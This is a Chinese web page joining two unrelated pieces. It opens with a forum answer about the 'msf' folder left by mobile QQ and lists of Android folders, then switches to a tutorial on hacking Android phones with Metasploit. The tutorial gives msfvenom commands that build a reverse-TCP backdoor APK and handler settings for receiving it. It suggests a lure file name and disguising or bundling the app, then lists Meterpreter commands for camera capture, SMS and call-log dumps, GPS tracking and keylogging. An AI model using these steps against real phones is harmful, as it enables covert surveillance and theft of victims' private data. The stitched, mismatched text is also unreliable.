手机：msf文件

Posted 2023-04-12

我手机QQ文件夹里出现了好多什么 msf.13.02.12.02.log 只是最后2个数字在变，从1开始，请问这是什么东西？可以删除吗？

　　msf 手机QQ产生的的一个文件夹。
　　1、android 比较重要的文件夹，里面是一些程序数据，比如google map的地图缓存。
　　2、AndroidOptimizer 安装“安卓优化大师”后生成的文件夹
　　3、AndroidSDLPAL 解压AndroidSDLPAL_95.zip，得到AndroidSDLPAL文件夹
　　4、babyplan_caches 宝贝全计划缓存文件
　　5、baidu 顾名思义，掌上百度、百度输入法之类程序的缓存文件夹。
　　6、BaiduMap 百度地图文件夹"
　　7、BcgmDict"
　　8、Beats 跳舞机之类的游戏
　　9、boyaa_texas_v2 得克萨斯扑克游戏
　　10、cache
　　11、camera3601
　　12、chinapay
　　13、DCIM 相机的缓存文件夹。
　　14、documents Documents To Go 的相关文件夹。
　　15、DomobInterstitial 是水果忍者里面弹出广告和一些照片
　　16、download 下载文件夹
　　17、downloaded_rom 系统更新文件夹
　　18、droidhen 用手机当电脑摄象头软件的文件夹
　　19、DX-Theme 点心桌面软件文件夹
　　20、ea EA出品的游戏（我的是极品飞车）
　　21、gameloft gameloft/games文件夹是存放游戏数据的。Gameloft的大型游戏都有几十MB到上百MB的游戏数据与主程序分开存放。你安装完相应的游戏后，可以打开wifi再运行游戏，会自动下载游戏数据资料到这个文件夹；或者也可以不开wifi，从网上下载相应的游戏数据包解压后放到gameloft/games文件夹下面。
　　22、gfan 机锋论坛
　　23、Go NoteWidget 透明便签软件的文档记录
　　24、GOLauncherEX GO桌面的缓存文件夹，想换字体的话，字体文件放在这个文件夹的fonts目录下。
　　25、GoStore GO桌面留下的文件夹!
　　26、果合移动广告,是个广告软件的文件夹！一般可能是缓存的软件在里面,如果他自动生成的话就可能不好删除了！
　　27、iReader 顾名思义，ireader的缓存文件夹。
　　28、LiveBeautyle 腿模
　　29、LOST.DIR 卡上丢失或出错的文件会跑这里，此目录无用，删了会自动生成。
　　30、miliao 顾名思义，米聊的缓存文件夹。
　　31、MIUI 顾名思义，MIUI的缓存文件夹。
　　32、mosecurity 这个应该是金山卫士的文件夹！
　　33、Movies 顾名思义，电影的缓存文件夹。
　　34、msf 手机QQ产生的
　　35、muzhiwan 顾名思义，拇指玩的缓存文件夹。
　　36、NceEnglish 新概念英译缓存文件夹
　　37、Notifications 在SD卡任意位置建立名为“notifications”的文件夹，把自己的铃音扔进去 指手机内存（网上查的，我没太看懂）
　　38、openfeint 顾名思义，openfeint的缓存文件夹 （OpenFeint是一个基于SNS的平台，为ios和andriod系统提供在线游戏竞技的技术平台）
　　39、p2pcache 手机快播视频缓存文件夹，（目前快播安卓版使用小文件策略，所以下载完也还是！mv文件，关于下载完合成完整视频的需求已经提交给开发人员评估是否在后续本优化改进）
　　40、persist_images 一款拍照软件图片存放文件夹
　　41、Pictures 截屏图片存放处（查了下我的手机是这样）
　　42、Podcasts 播客文件夹（网络解释），删了不影响!
　　43、QDReader 起点读书缓存文件夹
　　44、QuickPai 顾名思义，QuickPai的缓存文件夹条（我的是二维条码扫描器软件）。
　　45、qvod 顾名思义，qvod的缓存文件夹
　　46、ringtones 网上下载铃声存放文件夹
　　47、RMS 这是一个你进入木马清理或者系统优化时的临时备份文件
　　48、ROMs 模拟器文件夹
　　49、sgsupdate 是三国杀的升级文件安装包
　　50、snda 盛大网络公司出的游戏，如果你卸载了产品这个也可以删掉。
　　51、spbshell_log SPB主题日志
　　52、svox一款中文语音插件，可以支持多种语言阅读，第三方语音识别软件
　　53、TalkingFriends 会说话的tom猫录制的视频文件所保存的目录。
　　54、Tencent ，腾讯软件的缓存目录。
　　55、tmpcache 酷我音乐下载时缓存文件夹
　　56、ttpod ttpod是天天动听的安装目录，里面会有一些文件夹都是相关功能的目录，一般会有：data—系统目录，skin—皮肤目录，lyrics—歌词目录，log—日志文件目录（有关天天动听运行的一些记录，如果运行有问题，log.txt这个文件可以很直观的看出是哪一个环节出了问题。）
　　57、UCDownloads UCweb浏览器下载文件缓存的保存目录。
　　58、UCMobileConfig UC浏览器中的配置文件
　　59、youmicache 这是一个广告联盟的广告缓存文件，（你用的其他软件有挂这个联盟的广告就会有这个文件夹，要彻底删掉就要删除那些带这个联盟广告的软件 ）

　　另一种分析方法

　　1、.android_secure 是官方app2sd的产物，删了之后装到sd卡中的软件就无法使用了，小心别误删。
　　2、.Bluetooth 用蓝牙之后就会有这个。0 c+ y- J, _# I1 b$ J
　　3、.mobo Moboplayer的缓存文件。
　　4、.QQ QQ的缓存文件，定期清除。
　　5、.quickoffice 顾名思义，quickoffice的缓存文件。
　　6、.switchpro 顾名思义，switchprowidget（多键开关)的缓存文件。
　　7、.ucdlres UC迅雷的缓存文件。
　　8、albumart 音乐专辑封面的缓存文件夹。
　　9、albums 相册缩略图的缓存文件夹。
　　10、Android 比较重要的文件夹，里面是一些程序数据，比如google map的地图缓存，误删掉后地图还需重新下载。
　　11、backups 一些备份文件，比如联系人导出到SD卡时会导入到此文件夹。
　　12、baidu 顾名思义，掌上百度、百度输入法之类程序的缓存文件夹。
　　13、bugtogo 系统出现问题的时候会形成一些报告文件，存放于此文件夹。
　　14、cmp 个人判断是音乐的缓存文件夹。
　　15、data 同样是缓存数据的文件夹，与Android性质类似。
　　16、DCIM 相机的随机缓存文件夹，一些功能设置参数的记录 ，及时整理清除。
　　17、documents Documents To Go 的相关文件夹。
　　18、etouch 易行的缓存文件夹。
　　19、extracted androzip等解压缩软件默认的解压目录。
　　20、gameloft gameloft游戏数据包存放的文件夹。
　　21、handcent 顾名思义handcent（超级短信）数据文件夹。
　　22、handyCurrency 货币汇率相关的文件夹，装了handycalc（科学计算器）之后才会有。
　　23、ireader 顾名思义，ireader的缓存文件夹。
　　24、KingReader 开卷有益的缓存文件夹。
　　25、LazyList Applanet（黑市场）的缓存目录，也许和其他程序也有关，暂时不太清楚，慎重使用。
　　26、LOST.DIR 卡上丢失或出错的文件会跑这里，此目录无用，删了会自动生成。
　　27、moji 顾名思义，墨迹天气的缓存目录。
　　28、MusicFolders poweramp产生的缓存文件夹。
　　29、openfeint 顾名思义，openfeint的缓存文件夹。
　　30、Picstore 图片浏览软件建立的一个目录。
　　31、Playlists 播放列表的缓存文件夹。
　　32、renren 顾名思义，人人网客户端的缓存文件夹。
　　33、screenshot 貌似是截屏图片保存的目录，不过我不记得自己装过screenshot这个软件，或许不好用删了。
　　34、ShootMe 顾名思义 shootme截屏后图片文件保存的目录。
　　35、SmartpixGames Smartpix Games出品游戏的缓存文件夹，比如Jewellust。
　　36、sogou 顾名思义，搜狗拼音输入法的随机缓存文件夹)
　　37、SpeedSoftware RE文件管理器的缓存文件夹。
　　38、SystemAppBackup SystemApp remove （深度卸载）备份系统文件后，备份文件保存的目录。
　　39、TalkingFriends talking tom（会说话的tom猫）录制的视频文件所保存的目录。
　　40、Tencent 顾名思义，腾讯软件的缓存目录，比如QQ。（与上面的.QQ文件夹并不相同）
　　41、TitaniumBackup 钛备份备份的程序所保存的目录。
　　42、TunnyBrowser 感觉是海豚浏览器的缓存目录，但为什么叫这个名字？，金枪鱼浏览器.....
　　43、UCDLFiles UC迅雷下载文件的保存目录。
　　44、UCDownloads UCweb浏览器下载文件缓存的保存目录。
　　45、VIE Vignette （晕影相机）的缓存目录。
　　46、V"PN 顾名思义，V|PN数据的缓存目录。(“|”为了反和谐）
　　47、yd_historys 有道词典搜索历史的缓存目录
　　48、yd_speech 有道词典单词发音的缓存目录。
　　49、youmicache 删掉后还会自动生成，悠米广告的缓存目录，广告程序内嵌在其程序中，没用别装有米。
　　50、Glu Glu系列游戏的资料包存放地，如3D猎鹿人，勇猛二兄弟等。
　　51、apadqq-images QQ for pad 的缓存目录。
　　52、DunDef 地牢守护者的数据包。
　　53、KuwoMusic 顾名思义，酷我音乐的相关文件夹。
　　54、MxBrowser 遨游的缓存目录。
　　55、Camera360 相机camera360的随机缓存目录，可以定期清除。
　　56、TTPod 顾名思义，天天动听的缓存目录。
　　57. My documents 自己手机启用各种程序任务记录文档 定期清除 时间长了会积累很多 占用SD卡内存。
　　58. .nomedia 手机中隐藏的音频 图片文件夹 可以自设在相关文件夹中。
　　59. media（媒体文档） 使用电话通话录音 或在线浏览视频等媒体 产生的音频文件 记录存档的目录 。 参考技术A 这是缓存，不要随便删追问

这个是不是聊天记录，但是我又清理了聊天记录？

追答

不是，是运行时产生的，缓存

本回答被提问者采纳 参考技术B 没关系，不用删 参考技术C 哎呀我去 。。我看到类似好多的 。今天我删除了 它有蹦出来了 。真特么愁人 。。。。跟聊天记录一样 。。。真可怕。，

Kali Linux利用MSF入侵安卓手机(小白版超详细)

Kali Linux利用MSF入侵安卓手机

• 一、什么是msf
• • 演示环境
• 二、渗透流程
• • 1.进入管理员模式
  • 2.生成可执行木马文件
  • 3.运行msfconsole命令
  • 4.配置参数
  • 5.在靶机打开可执行文件
  • 6.查看用户
• 三、meterpreter入侵安卓手机命令
• • 1.查看对方手机系统信息
  • 2.查看对方手机安装哪些app文件
  • 3.远程控制对方手机拍摄一张照片
  • 4.远程控制对方手机开起视频聊天
  • 5.实时查看对方手机的信息
  • 6.获取对方手机的通讯录
  • 7.实时获取对方手机GPS定位
  • 8.更多命令

一、什么是msf

msfvenom a Metasploit standalone payload generator，Also a replacement for msfpayload and msfencode.是用来生成后门的软件。
MSFvenom是Msfpayload和Msfencode的组合，将这两个工具都放在一个Framework实例中。自2015年6月8日起，msfvenom替换了msfpayload和msfencode。

演示环境

使用Kali 2021.3进行演示操作
目标靶机： 模拟器逍遥 Android 7.1.2
软件：msfvenom、msfconsole（Kali系统内置）

二、渗透流程

1.进入管理员模式

命令： sudo su
解释： 不在管理员模式下运行可能会有权限不够的提示，为了避免命令执行失败，在管理员下运行以下命令

提示：执行命令之后输入Kali的密码，密码是被隐藏的，直接输入然后回车即可

2.生成可执行木马文件

命令： msfvenom -p android/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口号> R > <文件名>.apk
实例： msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.32.1 LPORT=5555 R >Android.apk
解释： 本地ip写自己Kali的IP地址，用ifconfig就能查看自己Kali的IP地址
本地端口自己随便设置一个没有被占用的端口号，如果端口号被占用那么文件会生成失败，换一个端口号就性
文件名可以随便写自己喜欢的名字，比如写免费刷赞，可能更容易让目标主机上钩

这个就是Kali主机的IP地址

接下来运行命令生成木马

默认生成的文件在根目录下

把刚才生成的安卓后门放到目标靶机中去

3.运行msfconsole命令

命令： msfconsole

4.配置参数

(1)命令： use exploit/multi/handler（选择模块）
(2)命令： set payload android/meterpreter/reverse_tcp（选择攻击模块）
(3)命令： set LhOST 192.168.32.1（填写自己主机的IP地址）
(4)命令： set lport 5555（填写刚才生成文件时的端口号）
(5)命令： show options（查看设置参数）
(6)命令： exploit -z -j（后台执行）

参数设置好之后在靶机打开程序然后执行步骤6的命令，也可以直接输入命令exploit开始攻击,只要靶机安装了后门软件用什么方法都可以，直接run开始执行攻击也行

详细攻击配置参数演示：

现在等待靶机打开APP就可以了

5.在靶机打开可执行文件

我们这里也可以把这个程序伪装一下，把他的图标改一下，或者把它捆绑在某些软件上面，当用户打开就自动安装到对方电脑上面

6.查看用户

(1)命令： sessions（查看上钩的用户）
(2)命令： sessions -i 1（选择需要攻击的用户）

出现meterpreter你就已经成功的入侵成功

三、meterpreter入侵安卓手机命令

1.查看对方手机系统信息

命令： sysinfo

2.查看对方手机安装哪些app文件

命令： app_list

3.远程控制对方手机拍摄一张照片

命令： webcam_snap

4.远程控制对方手机开起视频聊天

命令： webcam_chat

5.实时查看对方手机的信息

命令： dump_sms

6.获取对方手机的通讯录

命令： dump_calllog

7.实时获取对方手机GPS定位

命令： geolocate

8.更多命令

还可以查看帮助文档，命令help

cmd指令:
cat 读取文件内容到屏幕
cd 更改目录
checksum 检索文件的校验和
cp 将源复制到目标
del 删除指定文件
dir 列出文件（ls 的别名）
下载 下载文件或目录
编辑 编辑文件
getlwd 打印本地工作目录
getwd 打印工作目录
lcd 更改本地工作目录
lls 列出本地文件
lpwd 打印本地工作目录
ls 列出文件
mkdir 创建目录
mv 将源移动到目标
pwd 打印工作目录
rm 删除指定文件
rmdir 删除目录
search 搜索文件
show_mount 列出所有挂载点/逻辑驱动器
upload 上传文件或目录
pkill 按名称终止进程

meterpreter命令：
keyscan_start 开始捕获击键（开始键盘记录）
keyscan_dump 转储按键缓冲（下载键盘记录）
keyscan_stop 停止捕获击键（停止键盘记录）
record_mic X秒从默认的麦克风record_mic音频记录（音频录制）
webcam_chat 开始视频聊天（视频，对方会有弹窗）
webcam_list 单摄像头（查看摄像头列表）
webcam_snap 采取快照从指定的摄像头（摄像头拍摄一张照片）
webcam_stream 播放视频流从指定的摄像头（开启摄像头监控）
enumdesktops 列出所有可访问的桌面和窗口站（窗体列表）
getdesktop 得到当前的Meterpreter桌面
reboot 重新启动远程计算机
shutdown 关闭远程计算机
shell 放入系统命令 shell
enumdesktops 列出所有可访问的桌面和窗口站
getdesktop 获取当前的meterpreter桌面
idletime 返回远程用户空闲的秒数
keyboard_send 发送击键
keyevent 发送按键事件
keyscan_dump 转储击键缓冲区
keyscan_start 开始捕获击键
keyscan_stop 停止捕获击键
mouse 发送鼠标事件
screenshare 实时观看远程用户桌面
screenshot 抓取交互式桌面的屏幕截图
setdesktop 更改 Meterpreters 当前桌面
uictl 控制一些用户界面组件
record_mic 从默认麦克风录制音频 X 秒
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定的网络摄像头拍摄快照
webcam_stream 播放来自指定网络摄像头的视频流
play 在目标系统上播放波形音频文件 (.wav)
getsystem 尝试将您的权限提升到本地系统的权限
execute -f notepad 打开记事本

把文件上传到靶机命令

把文件下载到主机命令